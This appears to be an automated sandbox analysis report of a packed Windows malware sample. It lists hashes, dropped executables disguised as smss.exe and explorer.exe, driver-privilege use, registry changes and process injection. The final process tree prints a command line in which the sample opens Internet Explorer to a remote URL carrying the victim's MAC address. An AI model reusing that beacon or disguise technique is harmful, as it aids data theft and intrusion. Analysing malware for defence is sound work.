a074f1f3954df88b0b5c7c55f4d1b971480aeffe143650830909a7962885e14c

Analysis

max time kernel
170s
max time network
215s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
03/12/2022, 18:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a074f1f3954df88b0b5c7c55f4d1b971480aeffe143650830909a7962885e14c.exe
Size

138KB
MD5

9cab9d0c6ff0763fc61eaff156fcfaab
SHA1

edde925a9b596ae8534e9924eeb9ea29a56bafcf
SHA256

a074f1f3954df88b0b5c7c55f4d1b971480aeffe143650830909a7962885e14c
SHA512

11acf8cb858f9447153880919cf14115c4fa31db63356bd45b5cf0d9ce7d48c71b0f4f9856f47eea46875c77594d5aaf6b8656177f71b179cc317d632b72434b
SSDEEP

3072:OtdacF5GnhkO/7/vcyEcJRFpAyj3Sxt+:qPWnTrFvFVzS

Score

8^/10

upx

Malware Config

Signatures

Executes dropped EXE 64 IoCs

pid	Process
4900	reajijjcrbeo.exe
4504	smss.exe
1708	smss.exe
1236	smss.exe
3432	smss.exe
1676	smss.exe
5068	smss.exe
1504	smss.exe
4416	smss.exe
2660	smss.exe
2624	smss.exe
3896	smss.exe
3964	smss.exe
3892	smss.exe
2200	smss.exe
2444	explorer.exe
2352	explorer.exe
1756	explorer.exe
3380	smss.exe
4996	explorer.exe
4016	explorer.exe
3336	explorer.exe
3784	smss.exe
4960	smss.exe
4332	smss.exe
5000	smss.exe
1524	smss.exe
2480	smss.exe
4860	smss.exe
2852	explorer.exe
1288	explorer.exe
4156	explorer.exe
1244	smss.exe
3064	smss.exe
1388	smss.exe
4020	smss.exe
3232	smss.exe
3524	smss.exe
752	smss.exe
856	smss.exe
4440	smss.exe
2460	explorer.exe
2960	explorer.exe
4128	smss.exe
2360	smss.exe
4796	smss.exe
4336	smss.exe
3480	smss.exe
2816	smss.exe
4188	smss.exe
2556	smss.exe
1984	smss.exe
4644	smss.exe
2336	smss.exe
2068	smss.exe
1040	explorer.exe
2488	smss.exe
4752	smss.exe
4748	smss.exe
4724	smss.exe
4300	smss.exe
4740	smss.exe
1760	smss.exe
1972	smss.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0006000000022de2-135.dat	upx
behavioral2/files/0x0006000000022de2-136.dat	upx
behavioral2/memory/4900-137-0x0000000000400000-0x0000000000450000-memory.dmp	upx
behavioral2/files/0x0006000000022deb-139.dat	upx
behavioral2/memory/4504-140-0x0000000000400000-0x0000000000450000-memory.dmp	upx
behavioral2/files/0x0006000000022deb-141.dat	upx
behavioral2/files/0x0006000000022dec-142.dat	upx
behavioral2/files/0x0006000000022deb-144.dat	upx
behavioral2/memory/1708-145-0x0000000000400000-0x0000000000450000-memory.dmp	upx
behavioral2/files/0x0006000000022dec-146.dat	upx
behavioral2/files/0x0006000000022deb-148.dat	upx
behavioral2/memory/1236-149-0x0000000000400000-0x0000000000450000-memory.dmp	upx
behavioral2/files/0x0006000000022deb-152.dat	upx
behavioral2/memory/3432-153-0x0000000000400000-0x0000000000450000-memory.dmp	upx
behavioral2/files/0x0006000000022dec-154.dat	upx
behavioral2/files/0x0006000000022deb-156.dat	upx
behavioral2/memory/4900-157-0x0000000000400000-0x0000000000450000-memory.dmp	upx
behavioral2/memory/1676-158-0x0000000000400000-0x0000000000450000-memory.dmp	upx
behavioral2/files/0x0006000000022deb-161.dat	upx
behavioral2/memory/4504-162-0x0000000000400000-0x0000000000450000-memory.dmp	upx
behavioral2/memory/5068-163-0x0000000000400000-0x0000000000450000-memory.dmp	upx
behavioral2/memory/1708-164-0x0000000000400000-0x0000000000450000-memory.dmp	upx
behavioral2/files/0x0006000000022dec-165.dat	upx
behavioral2/files/0x0006000000022deb-167.dat	upx
behavioral2/memory/1236-168-0x0000000000400000-0x0000000000450000-memory.dmp	upx
behavioral2/memory/1504-169-0x0000000000400000-0x0000000000450000-memory.dmp	upx
behavioral2/files/0x0006000000022deb-172.dat	upx
behavioral2/memory/3432-173-0x0000000000400000-0x0000000000450000-memory.dmp	upx
behavioral2/memory/4416-174-0x0000000000400000-0x0000000000450000-memory.dmp	upx
behavioral2/files/0x0006000000022dec-175.dat	upx
behavioral2/files/0x0006000000022deb-177.dat	upx
behavioral2/memory/2660-178-0x0000000000400000-0x0000000000450000-memory.dmp	upx
behavioral2/memory/1676-179-0x0000000000400000-0x0000000000450000-memory.dmp	upx
behavioral2/files/0x0006000000022dec-180.dat	upx
behavioral2/files/0x0006000000022deb-182.dat	upx
behavioral2/memory/5068-183-0x0000000000400000-0x0000000000450000-memory.dmp	upx
behavioral2/memory/2624-184-0x0000000000400000-0x0000000000450000-memory.dmp	upx
behavioral2/files/0x0006000000022deb-187.dat	upx
behavioral2/files/0x0006000000022dec-188.dat	upx
behavioral2/files/0x0006000000022deb-191.dat	upx
behavioral2/memory/1504-189-0x0000000000400000-0x0000000000450000-memory.dmp	upx
behavioral2/memory/3964-192-0x0000000000400000-0x0000000000450000-memory.dmp	upx
behavioral2/memory/4416-193-0x0000000000400000-0x0000000000450000-memory.dmp	upx
behavioral2/files/0x0006000000022dec-194.dat	upx
behavioral2/files/0x0006000000022deb-196.dat	upx
behavioral2/memory/3892-197-0x0000000000400000-0x0000000000450000-memory.dmp	upx
behavioral2/memory/2660-198-0x0000000000400000-0x0000000000450000-memory.dmp	upx
behavioral2/files/0x0006000000022dec-199.dat	upx
behavioral2/files/0x0006000000022deb-201.dat	upx
behavioral2/memory/2624-202-0x0000000000400000-0x0000000000450000-memory.dmp	upx
behavioral2/memory/3896-203-0x0000000000400000-0x0000000000450000-memory.dmp	upx
behavioral2/files/0x0006000000022dec-207.dat	upx
behavioral2/files/0x0006000000022dec-208.dat	upx
behavioral2/files/0x0006000000022dec-209.dat	upx
behavioral2/files/0x0006000000022dec-211.dat	upx
behavioral2/files/0x0006000000022deb-213.dat	upx
behavioral2/memory/3964-214-0x0000000000400000-0x0000000000450000-memory.dmp	upx
behavioral2/files/0x0006000000022dec-216.dat	upx
behavioral2/memory/3892-217-0x0000000000400000-0x0000000000450000-memory.dmp	upx
behavioral2/files/0x0006000000022dec-219.dat	upx
behavioral2/memory/2200-220-0x0000000000400000-0x0000000000450000-memory.dmp	upx
behavioral2/files/0x0006000000022dec-222.dat	upx
behavioral2/files/0x0006000000022deb-224.dat	upx
behavioral2/memory/2444-225-0x0000000000400000-0x0000000000450000-memory.dmp	upx

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\l:	smss.exe
File opened (read-only)	\??\y:	smss.exe
File opened (read-only)	\??\f:	smss.exe
File opened (read-only)	\??\s:	smss.exe
File opened (read-only)	\??\l:	smss.exe
File opened (read-only)	\??\v:	smss.exe
File opened (read-only)	\??\i:	explorer.exe
File opened (read-only)	\??\e:	smss.exe
File opened (read-only)	\??\x:	smss.exe
File opened (read-only)	\??\w:	smss.exe
File opened (read-only)	\??\h:	smss.exe
File opened (read-only)	\??\i:	smss.exe
File opened (read-only)	\??\w:	smss.exe
File opened (read-only)	\??\p:	smss.exe
File opened (read-only)	\??\m:	smss.exe
File opened (read-only)	\??\e:	smss.exe
File opened (read-only)	\??\r:	smss.exe
File opened (read-only)	\??\q:	smss.exe
File opened (read-only)	\??\m:	smss.exe
File opened (read-only)	\??\g:	explorer.exe
File opened (read-only)	\??\j:	explorer.exe
File opened (read-only)	\??\r:	explorer.exe
File opened (read-only)	\??\z:	explorer.exe
File opened (read-only)	\??\f:	smss.exe
File opened (read-only)	\??\k:	explorer.exe
File opened (read-only)	\??\t:	smss.exe
File opened (read-only)	\??\q:	explorer.exe
File opened (read-only)	\??\z:	explorer.exe
File opened (read-only)	\??\x:	smss.exe
File opened (read-only)	\??\h:	explorer.exe
File opened (read-only)	\??\y:	smss.exe
File opened (read-only)	\??\n:	smss.exe
File opened (read-only)	\??\i:	smss.exe
File opened (read-only)	\??\s:	smss.exe
File opened (read-only)	\??\u:	smss.exe
File opened (read-only)	\??\z:	smss.exe
File opened (read-only)	\??\x:	smss.exe
File opened (read-only)	\??\j:	smss.exe
File opened (read-only)	\??\q:	explorer.exe
File opened (read-only)	\??\p:	smss.exe
File opened (read-only)	\??\k:	smss.exe
File opened (read-only)	\??\n:	smss.exe
File opened (read-only)	\??\g:	smss.exe
File opened (read-only)	\??\i:	smss.exe
File opened (read-only)	\??\q:	smss.exe
File opened (read-only)	\??\v:	smss.exe
File opened (read-only)	\??\p:	smss.exe
File opened (read-only)	\??\h:	explorer.exe
File opened (read-only)	\??\j:	smss.exe
File opened (read-only)	\??\p:	explorer.exe
File opened (read-only)	\??\z:	explorer.exe
File opened (read-only)	\??\h:	explorer.exe
File opened (read-only)	\??\m:	smss.exe
File opened (read-only)	\??\i:	explorer.exe
File opened (read-only)	\??\t:	smss.exe
File opened (read-only)	\??\s:	smss.exe
File opened (read-only)	\??\i:	smss.exe
File opened (read-only)	\??\y:	smss.exe
File opened (read-only)	\??\r:	explorer.exe
File opened (read-only)	\??\t:	explorer.exe
File opened (read-only)	\??\z:	smss.exe
File opened (read-only)	\??\f:	smss.exe
File opened (read-only)	\??\u:	smss.exe
File opened (read-only)	\??\n:	smss.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe	explorer.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	explorer.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe	explorer.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	explorer.exe
File opened for modification	C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	explorer.exe
File created	C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe	explorer.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	explorer.exe
File created	C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	explorer.exe
File created	C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe	explorer.exe
File created	C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	explorer.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	explorer.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	explorer.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	explorer.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\fxechqhryrxh\smss.exe	smss.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 28 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31001037"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{90E726EF-75C0-11ED-BF5F-F675107A8182} = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2031192689"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31001037"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31001037"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31001037"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000eef4ddb70fa9964f8bf69d510f57c1eb0000000002000000000010660000000100002000000023b9c9be59bc9a0104affdf58997ac8d9d591a39a117e06e334aaa0ad56a41c0000000000e800000000200002000000005d9f7f6d662b21f5b1c5ae5f8ab684eea4c6b48df4344c94e06a165a9ca31c32000000080cbcfd8629ced4ad0d2da40644ad4a87d8ccf125214e571cc6292dd5e801c8d400000000a3c1d1f94c8999d343876802e6d7a60745fbd7570350d2d2a40d2138bba6106048a9897d8de06c9f0331b8dae676fa53a38b4050cff8c8c81c0851ece946e9a	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1919632478"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2031192689"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1919632478"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 70a19c90cd09d901	IEXPLORE.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeLoadDriverPrivilege	4900	reajijjcrbeo.exe
Token: SeLoadDriverPrivilege	4504	smss.exe
Token: SeLoadDriverPrivilege	1708	smss.exe
Token: SeLoadDriverPrivilege	1236	smss.exe
Token: SeLoadDriverPrivilege	3432	smss.exe
Token: SeLoadDriverPrivilege	1676	smss.exe
Token: SeLoadDriverPrivilege	5068	smss.exe
Token: SeLoadDriverPrivilege	1504	smss.exe
Token: SeLoadDriverPrivilege	4416	smss.exe
Token: SeLoadDriverPrivilege	2660	smss.exe
Token: SeLoadDriverPrivilege	2624	smss.exe
Token: SeLoadDriverPrivilege	3896	smss.exe
Token: SeLoadDriverPrivilege	3964	smss.exe
Token: SeLoadDriverPrivilege	3892	smss.exe
Token: SeLoadDriverPrivilege	2200	smss.exe
Token: SeLoadDriverPrivilege	4996	explorer.exe
Token: SeLoadDriverPrivilege	2444	explorer.exe
Token: SeLoadDriverPrivilege	1756	explorer.exe
Token: SeLoadDriverPrivilege	2352	explorer.exe
Token: SeLoadDriverPrivilege	3336	explorer.exe
Token: SeLoadDriverPrivilege	4016	explorer.exe
Token: SeLoadDriverPrivilege	3380	smss.exe
Token: SeLoadDriverPrivilege	3784	smss.exe
Token: SeLoadDriverPrivilege	4960	smss.exe
Token: SeLoadDriverPrivilege	4332	smss.exe
Token: SeLoadDriverPrivilege	5000	smss.exe
Token: SeLoadDriverPrivilege	2480	smss.exe
Token: SeLoadDriverPrivilege	1524	smss.exe
Token: SeLoadDriverPrivilege	4860	smss.exe
Token: SeLoadDriverPrivilege	2852	explorer.exe
Token: SeLoadDriverPrivilege	1288	explorer.exe
Token: SeLoadDriverPrivilege	752	smss.exe
Token: SeLoadDriverPrivilege	2460	explorer.exe
Token: SeLoadDriverPrivilege	3232	smss.exe
Token: SeLoadDriverPrivilege	4440	smss.exe
Token: SeLoadDriverPrivilege	856	smss.exe
Token: SeLoadDriverPrivilege	3524	smss.exe
Token: SeLoadDriverPrivilege	4020	smss.exe
Token: SeLoadDriverPrivilege	1388	smss.exe
Token: SeLoadDriverPrivilege	3064	smss.exe
Token: SeLoadDriverPrivilege	4156	explorer.exe
Token: SeLoadDriverPrivilege	1244	smss.exe
Token: SeLoadDriverPrivilege	2960	explorer.exe
Token: SeLoadDriverPrivilege	2360	smss.exe
Token: SeLoadDriverPrivilege	2816	smss.exe
Token: SeLoadDriverPrivilege	4188	smss.exe
Token: SeLoadDriverPrivilege	4336	smss.exe
Token: SeLoadDriverPrivilege	3480	smss.exe
Token: SeLoadDriverPrivilege	2556	smss.exe
Token: SeLoadDriverPrivilege	2336	smss.exe
Token: SeLoadDriverPrivilege	4796	smss.exe
Token: SeLoadDriverPrivilege	1984	smss.exe
Token: SeLoadDriverPrivilege	4128	smss.exe
Token: SeLoadDriverPrivilege	4644	smss.exe
Token: SeLoadDriverPrivilege	2488	smss.exe
Token: SeLoadDriverPrivilege	1196	smss.exe
Token: SeLoadDriverPrivilege	4300	smss.exe
Token: SeLoadDriverPrivilege	2820	smss.exe
Token: SeLoadDriverPrivilege	2208	smss.exe
Token: SeLoadDriverPrivilege	1760	smss.exe
Token: SeLoadDriverPrivilege	4748	smss.exe
Token: SeLoadDriverPrivilege	4740	smss.exe
Token: SeLoadDriverPrivilege	2068	smss.exe
Token: SeLoadDriverPrivilege	4724	smss.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3104	IEXPLORE.EXE

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
3104	IEXPLORE.EXE
3104	IEXPLORE.EXE
4176	IEXPLORE.EXE
4176	IEXPLORE.EXE
4176	IEXPLORE.EXE
4176	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1944 wrote to memory of 2276	1944	a074f1f3954df88b0b5c7c55f4d1b971480aeffe143650830909a7962885e14c.exe	83
PID 1944 wrote to memory of 2276	1944	a074f1f3954df88b0b5c7c55f4d1b971480aeffe143650830909a7962885e14c.exe	83
PID 1944 wrote to memory of 2276	1944	a074f1f3954df88b0b5c7c55f4d1b971480aeffe143650830909a7962885e14c.exe	83
PID 2276 wrote to memory of 3104	2276	iexplore.exe	84
PID 2276 wrote to memory of 3104	2276	iexplore.exe	84
PID 3104 wrote to memory of 4176	3104	IEXPLORE.EXE	85
PID 3104 wrote to memory of 4176	3104	IEXPLORE.EXE	85
PID 3104 wrote to memory of 4176	3104	IEXPLORE.EXE	85
PID 1944 wrote to memory of 4900	1944	a074f1f3954df88b0b5c7c55f4d1b971480aeffe143650830909a7962885e14c.exe	86
PID 1944 wrote to memory of 4900	1944	a074f1f3954df88b0b5c7c55f4d1b971480aeffe143650830909a7962885e14c.exe	86
PID 1944 wrote to memory of 4900	1944	a074f1f3954df88b0b5c7c55f4d1b971480aeffe143650830909a7962885e14c.exe	86
PID 4900 wrote to memory of 4504	4900	reajijjcrbeo.exe	87
PID 4900 wrote to memory of 4504	4900	reajijjcrbeo.exe	87
PID 4900 wrote to memory of 4504	4900	reajijjcrbeo.exe	87
PID 4504 wrote to memory of 1708	4504	smss.exe	88
PID 4504 wrote to memory of 1708	4504	smss.exe	88
PID 4504 wrote to memory of 1708	4504	smss.exe	88
PID 1708 wrote to memory of 1236	1708	smss.exe	89
PID 1708 wrote to memory of 1236	1708	smss.exe	89
PID 1708 wrote to memory of 1236	1708	smss.exe	89
PID 1236 wrote to memory of 3432	1236	smss.exe	90
PID 1236 wrote to memory of 3432	1236	smss.exe	90
PID 1236 wrote to memory of 3432	1236	smss.exe	90
PID 3432 wrote to memory of 1676	3432	smss.exe	91
PID 3432 wrote to memory of 1676	3432	smss.exe	91
PID 3432 wrote to memory of 1676	3432	smss.exe	91
PID 1676 wrote to memory of 5068	1676	smss.exe	92
PID 1676 wrote to memory of 5068	1676	smss.exe	92
PID 1676 wrote to memory of 5068	1676	smss.exe	92
PID 5068 wrote to memory of 1504	5068	smss.exe	93
PID 5068 wrote to memory of 1504	5068	smss.exe	93
PID 5068 wrote to memory of 1504	5068	smss.exe	93
PID 1504 wrote to memory of 4416	1504	smss.exe	94
PID 1504 wrote to memory of 4416	1504	smss.exe	94
PID 1504 wrote to memory of 4416	1504	smss.exe	94
PID 4416 wrote to memory of 2660	4416	smss.exe	95
PID 4416 wrote to memory of 2660	4416	smss.exe	95
PID 4416 wrote to memory of 2660	4416	smss.exe	95
PID 2660 wrote to memory of 2624	2660	smss.exe	96
PID 2660 wrote to memory of 2624	2660	smss.exe	96
PID 2660 wrote to memory of 2624	2660	smss.exe	96
PID 2624 wrote to memory of 3896	2624	smss.exe	97
PID 2624 wrote to memory of 3896	2624	smss.exe	97
PID 2624 wrote to memory of 3896	2624	smss.exe	97
PID 3896 wrote to memory of 3964	3896	smss.exe	98
PID 3896 wrote to memory of 3964	3896	smss.exe	98
PID 3896 wrote to memory of 3964	3896	smss.exe	98
PID 3964 wrote to memory of 3892	3964	smss.exe	99
PID 3964 wrote to memory of 3892	3964	smss.exe	99
PID 3964 wrote to memory of 3892	3964	smss.exe	99
PID 3892 wrote to memory of 2200	3892	smss.exe	100
PID 3892 wrote to memory of 2200	3892	smss.exe	100
PID 3892 wrote to memory of 2200	3892	smss.exe	100
PID 4900 wrote to memory of 2444	4900	reajijjcrbeo.exe	101
PID 4900 wrote to memory of 2444	4900	reajijjcrbeo.exe	101
PID 4900 wrote to memory of 2444	4900	reajijjcrbeo.exe	101
PID 4504 wrote to memory of 2352	4504	smss.exe	103
PID 4504 wrote to memory of 2352	4504	smss.exe	103
PID 4504 wrote to memory of 2352	4504	smss.exe	103
PID 1944 wrote to memory of 4180	1944	a074f1f3954df88b0b5c7c55f4d1b971480aeffe143650830909a7962885e14c.exe	102
PID 1944 wrote to memory of 4180	1944	a074f1f3954df88b0b5c7c55f4d1b971480aeffe143650830909a7962885e14c.exe	102
PID 1944 wrote to memory of 4180	1944	a074f1f3954df88b0b5c7c55f4d1b971480aeffe143650830909a7962885e14c.exe	102
PID 1708 wrote to memory of 1756	1708	smss.exe	104
PID 1708 wrote to memory of 1756	1708	smss.exe	104

C:\Users\Admin\AppData\Local\Temp\a074f1f3954df88b0b5c7c55f4d1b971480aeffe143650830909a7962885e14c.exe
"C:\Users\Admin\AppData\Local\Temp\a074f1f3954df88b0b5c7c55f4d1b971480aeffe143650830909a7962885e14c.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1944
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://dd.zxcvbnmzxcvbnm.com/Chinago.ashx?Mac=F6:75:10:7A:81:82&UserId=118&Bate=1.05
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2276
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
